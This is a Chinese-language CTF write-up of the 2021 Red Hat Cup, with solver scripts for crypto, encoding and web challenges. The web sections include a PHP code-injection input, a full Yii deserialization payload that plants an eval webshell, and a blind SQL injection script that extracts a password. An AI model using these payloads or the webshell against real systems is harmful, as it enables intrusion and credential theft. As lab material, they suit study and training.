2021年红帽杯线上解题记录

2021年第四届红帽杯部分解题记录,草稿里存了半年没发。

find-it

在这个输入点拼接的代码可以被执行。

code=?code=<?php%20phpinfo();//

读取hack.php的内容,找到flag。

flag{bac134ff-5265-4fa4-b333-66a84983225f}

primegame

import math
from decimal import *
import random
from sympy import Matrix
import struct

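getcontext().prec = int(100)  # 100 significant digits: ln(p) * 16**64 must keep an exact integer part

# Primes below 100 by trial division against the primes found so far.
# The original cutoff was ``i * i < j``, which never triggers for j <= i and so
# silently tested every prime; ``j * j > i`` is the intended early exit.  Both
# forms yield the same list.
primes = [2]
for i in range(3, 100):
    is_prime = True
    for j in primes:
        if j * j > i:
            break
        if i % j == 0:
            is_prime = False
            break
    if is_prime:
        primes.append(i)

# Natural logarithms of the primes at the context precision; these are the
# weights of the knapsack-style sum that ``encrypt`` computes.
# The ``int(...)`` wrappers are kept on purpose: ``Matrix(ZZ, ...)``/``.LLL()``
# further down are Sage API, and under the Sage preparser bare literals become
# Sage Integers, which Decimal presumably will not accept -- confirm if this is
# ever run as plain Python.
keys = [Decimal(int(p)).ln() for p in primes]

# Integer approximations of the weights, scaled by 16**64 (= 2**256).
arr = [int(v * int(16) ** int(64)) for v in keys]

# Ciphertext to recover: one of the two challenge outputs; the writeup runs the
# script once per value and concatenates the results.
ct = 597952043660446249020184773232983974017780255881942379044454676980646417087515453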

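def encrypt(res, weights=None):
    """Weighted sum of ``res`` against the prime logarithms, scaled to an int.

    Computes ``sum(res[i] * weights[i])`` in Decimal arithmetic at the current
    context precision and returns ``int(sum * 16**64)``, the value the lattice
    search in ``f`` compares against the module-level ``ct``.

    Args:
        res: Sequence of integers, at least as long as ``weights``.
        weights: Decimal weights; defaults to the module-level ``keys``.

    Returns:
        The scaled sum as an int.

    Raises:
        IndexError: If ``res`` is shorter than ``weights``.
    """
    if weights is None:
        weights = keys
    # Decimal(int(0)) / int(16)**int(64) stay as in the original so the values
    # remain plain Python ints under the Sage preparser.
    total = Decimal(int(0))
    for i, weight in enumerate(weights):
        total += res[i] * weight
    # Named ``scaled`` rather than ``ct`` so the module-level ``ct`` is not shadowed.
    scaled = int(total * int(16) ** int(64))
    return scaled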

def f(N):
    """Try to recover the plaintext bytes behind ``ct`` with an LLL lattice search.

    Builds an (ln+1) x (ln+1) integer matrix: identity rows carrying
    ``arr[i] // N`` in the last column, plus a final row of 64s ending in
    ``ct // N``.  After LLL, every reduced row whose first ``ln`` entries lie in
    [-64, 64) is shifted by +64 and re-encrypted; a match against ``ct`` is
    printed with ``N``, a mismatch is printed with "NO".

    NOTE(review): ``Matrix(ZZ, ...)`` and ``.LLL()`` are Sage API rather than
    sympy; the ``from sympy import Matrix`` at the top of the script is likely
    stale or shadows Sage's ``Matrix`` -- confirm which one is meant.

    Args:
        N: Divisor applied to ``arr`` and ``ct`` (the caller sweeps 2..9999).

    Returns:
        None; results are printed.
    """
    ln = len(arr)
    A = Matrix(ZZ, ln + 1, ln + 1)
    for i in range(ln):
        A[i, i] = 1
        A[i, ln] = arr[i] // N   # scaled-down weight in the last column
        A[ln, i] = 64            # offset row: recovered entries are byte - 64

    A[ln, ln] = ct // N

    res = A.LLL()

    for i in range(ln + 1):
        flag = True   # "this row is a candidate", not the CTF flag
        for j in range(ln):
            if -64 <= res[i][j] < 64:
                continue
            flag = False
            break
        if flag:
            # Undo the 64 offset; the last column is the ct slot, so drop it.
            vec = [int(v + 64) for v in res[i][:-1]]
            ret = encrypt(vec)
            if ret == ct:
                print(N, bytes(vec))
            else:
                print("NO", ret, bytes(vec))

# Sweep the divisor passed to ``f``; each value is echoed first so progress is
# visible during a long run.
for divisor in range(2, 10000):
    print(divisor)
    f(divisor)

将 ct 分别替换为两个 out 中的字符串,运行后把两次得到的结果拼接即可获得 flag。

flag{715c39c3-1b46-4c23-8006-27b43eba2446}

framework

下载 www.zip 获取源码,用 D盾 扫描发现后门,存在 Yii 代码执行漏洞。

构造 payload

http://eci-2zeebn8ci69dyqxvw06w.cloudeci1.ichunqiu.com//index.php?r=site%2Fabout&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MzI6InlpaVxjYWNoaW5nXEV4cHJlc3Npb25EZXBlbmRlbmN5IjoxOntzOjEwOiJleHByZXNzaW9uIjtzOjEwNzoiZmlsZV9wdXRfY29udGVudHMoJy92YXIvd3d3L2h0bWwvd2ViL2Fzc2V0cy95LnBocCcsJzw/cGhwIEBldmFsKCRfUkVRVUVTVFtlZWVdKTtzaG93X3NvdXJjZShfX0ZJTEVfXyk7Pz4nKTsiO31pOjE7czoxODoiZXZhbHVhdGVEZXBlbmRlbmN5Ijt9fX0K

在 assets/y.php 生成一句话木马,用蚁剑连接,使用 bypass disable functions 插件连接 shell 获取 flag。

flag{a7a179b8-9765-433c-9752-efd5a4b3be52}

hpcurve

import itertools
import struct

p = 10000000000000001119   # base-field modulus (presumably taken from the challenge)

# Polynomial ring over GF(p); ``y`` is only an alias for the variable ``x``.
R.<x> = GF(p)[]; y=x
f = y + y^7
# HyperellipticCurve(f, 0): the second argument is h = 0, so the curve is
# y^2 = x^7 + x.
C = HyperellipticCurve(f, 0)
J = C.jacobian()
# Divisors at x = 11, 22, 33 -- computed but never referenced again in this
# script (presumably mirrors the challenge's generator).
Ds = [J(C(x, min(f(x).sqrt(0,1)))) for x in (11,22,33)]

# Challenge ciphertext and the 25-byte known-plaintext prefix
# (20 padding 'a' bytes followed by "flag{").
t = '66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5'
enc = bytes.fromhex(t)
known_pt = 'a' * 20 + 'flag{'
known_pt = known_pt.encode()

# ``^^`` is Sage's XOR: ciphertext XOR known plaintext = first 25 keystream bytes.
rng_output = bytes(e^^m for e,m in zip(enc, known_pt))

# Split the keystream into 8-byte little-endian words: three full words plus a
# 1-byte tail (only ui[0..2] are used below).
blocks = [rng_output[i:i+8] for i in range(0, len(rng_output), 8)]
ui = [int.from_bytes(r, 'little') for r in blocks]
# Monic cubic built from the three words -- presumably the u-part of a Mumford
# representation of a Jacobian element; not confirmed here.
u = x^3 + ui[2]*x^2 + ui[1]*x + ui[0]

# Roots of u in the algebraic closure (they need not lie in GF(p) itself).
L = GF(p).algebraic_closure()
roots = [r[0] for r in u.change_ring(L).roots()]

# Interpolate v with v(xi) = sqrt(f(xi)) at each root, then pull the three
# coefficients back to base-field integers.
RR.<zz> = PolynomialRing(L)
v = RR.lagrange_polynomial([(xi, f(xi).sqrt()) for xi in roots])
vi = [v.coefficients()[i].as_finite_field_element()[1] for i in range(3)]
# Each square root is only known up to sign, hence the (-c, c) pair per coefficient.
vi = [(int(-c), int(c)) for c in vi]

for rs in itertools.product(*vi):
    # Candidate next 24 keystream bytes.  NOTE(review): ``q`` and ``rr`` are not
    # used below -- the decryption loop only recycles the first 24 bytes of
    # ``rng_output``, so every sign combination prints the same output.
    q = struct.pack('<'+'Q'*len(rs), *rs)
    rr = rng_output+q
    #print(len(q))
    #flag = bytes(rr[k%24]^^enc[k] for k in range(len(rr)))# :, enc))
    #print(flag)

    # XOR the whole ciphertext against rng_output cyclically with period 24
    # (rng_output holds 25 bytes).  ``print`` sits inside the loop, so the
    # growing prefix is printed once per byte.  ``x`` here shadows the ring
    # variable; nothing after this loop uses it.
    tt = ''
    i = 0
    for x in enc:
        tt += chr((rng_output[i%24]^^x))
        i+=1
        print(tt)

运行上面的脚本,获取后半部分 flag。

import itertools
import struct

p = 10000000000000001119   # base-field modulus (presumably taken from the challenge)

# Polynomial ring over GF(p); ``y`` is only an alias for the variable ``x``.
R.<x> = GF(p)[]; y=x
f = y + y^7
# HyperellipticCurve(f, 0): the second argument is h = 0, so the curve is
# y^2 = x^7 + x.
C = HyperellipticCurve(f, 0)
J = C.jacobian()
# Divisors at x = 11, 22, 33 -- computed but never referenced again in this
# script (presumably mirrors the challenge's generator).
Ds = [J(C(x, min(f(x).sqrt(0,1)))) for x in (11,22,33)]

# Challenge ciphertext and the 25-byte known-plaintext prefix
# (20 padding 'a' bytes followed by "flag{").
t = '66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5'
enc = bytes.fromhex(t)
known_pt = 'a' * 20 + 'flag{'
known_pt = known_pt.encode()

# ``^^`` is Sage's XOR: ciphertext XOR known plaintext = first 25 keystream bytes.
rng_output = bytes(e^^m for e,m in zip(enc, known_pt))

# Split the keystream into 8-byte little-endian words: three full words plus a
# 1-byte tail (only ui[0..2] are used below).
blocks = [rng_output[i:i+8] for i in range(0, len(rng_output), 8)]
ui = [int.from_bytes(r, 'little') for r in blocks]
# Monic cubic built from the three words -- presumably the u-part of a Mumford
# representation of a Jacobian element; not confirmed here.
u = x^3 + ui[2]*x^2 + ui[1]*x + ui[0]

# Roots of u in the algebraic closure (they need not lie in GF(p) itself).
L = GF(p).algebraic_closure()
roots = [r[0] for r in u.change_ring(L).roots()]
# Retried up to 10 times: the interpolation / coefficient extraction inside can
# fail (presumably when a square root does not land in the prime field).
# NOTE(review): the bare ``except: pass`` at the bottom hides *every* error,
# including typos in this block; narrowing it to the exception actually raised
# would make a run that never prints anything diagnosable.
for _ in range(10):
 try:
  # Interpolate v with v(xi) = sqrt(f(xi)) at each root, then pull the three
  # coefficients back to base-field integers; each root is only known up to
  # sign, hence the (-c, c) pair per coefficient.
  RR.<zz> = PolynomialRing(L)
  v = RR.lagrange_polynomial([(xi, f(xi).sqrt()) for xi in roots])
  vi = [v.coefficients()[i].as_finite_field_element()[1] for i in range(3)]
  vi = [(int(-c), int(c)) for c in vi]
#  print(vi)
  for rs in itertools.product(*vi):
   # One candidate 24-byte keystream (three little-endian u64 words) per sign
   # combination; the ciphertext is XORed against it cyclically and printed,
   # so one of the printed lines is the readable flag.
   keys = struct.pack('<'+'Q'*len(rs), *rs)
   leng = len(keys)
   keys = list(keys)
   enc = list(enc)   # bytes -> list on the first pass; a no-op afterwards
   flag = ""
   for i in range(len(enc)):
    flag += chr(keys[i%leng]^^enc[i])
   print(flag)
 except:
  pass
     # flag = bytes(q[k%len(q)]^^enc[k] for k in range(len(enc)))# :, enc))
     #print(flag)

运行后获取前半部分 flag

flag{1b82f60a-43ab-4f18-8ccc-97d120aae6fc}

WebsiteManger

import requests as req
import string

# Boolean-based blind SQL injection against the ``id`` parameter: an
# ``exists(select ... like '<prefix><char>%')`` clause is appended, with ``/**/``
# standing in for spaces.  The literal ``&&`` is a parameter separator to the
# web server, which is why the writeup rewrites it to ``%26%26`` in the proxy.
# Server-side, a parameterized query for the ``id`` lookup would close this.
url = "http://eci-2zeir5o8p6vh5j4c0dvu.cloudeci1.ichunqiu.com/image.php?id=1&&exists(select/**/1/**/from/**/users/**/where/**/password/**/like/**/'"
r = "%')"   # closes the LIKE pattern (``%`` wildcard) and the exists(...) clause

# Extend the recovered prefix one character at a time.  A response body longer
# than 200 bytes is treated as the "true" branch (the two response sizes are
# not shown on this page, the threshold is the author's); on a hit the
# character is appended and the candidate scan restarts from the alphabet start.
prefix = ""
while True:
    for x in string.ascii_letters+string.digits+"}{!@#":
        payload = url + prefix + x + r
        print payload   # Python 2 print statement: this script targets Python 2
        # Every request is routed through a local proxy on port 8080 so the
        # ``&&`` rewrite above can be applied in transit.
        f = req.get(payload,proxies = {"http":"127.0.0.1:8080"})
        print f.text
        if len(f.text) > 200:
            prefix += x
            break
    # NOTE(review): there is no terminating condition -- once no candidate
    # character extends the prefix, the outer loop keeps re-scanning the same
    # alphabet; the recovered value is read off the printed output.

在 Burp 转发过程中将 header 里的 && 替换为 %26%26,运行脚本获得密码 0df549b13756efae827f0,登录后获得 flag。

flag{de1a4ad3-856c-4aa9-afd1-5d57971543a3}

签到

ebcdic编码,python原生不支持,需要安装额外库pip install ebcdic。解码脚本如下:

import ebcdic


# Read the EBCDIC-encoded challenge file and print it decoded as code page 1141
# (a codec registered by the third-party ``ebcdic`` package, not the stdlib).
with open('EBCDIC.txt', 'rb') as infile:
    raw = infile.read()
print(raw.decode('cp1141'))

输出内容为 flagäwe1c0me_t0_redhat2021ü,其中 ä 和 ü 对应的是花括号,调整后得到 flag{we1c0me_t0_redhat2021}。
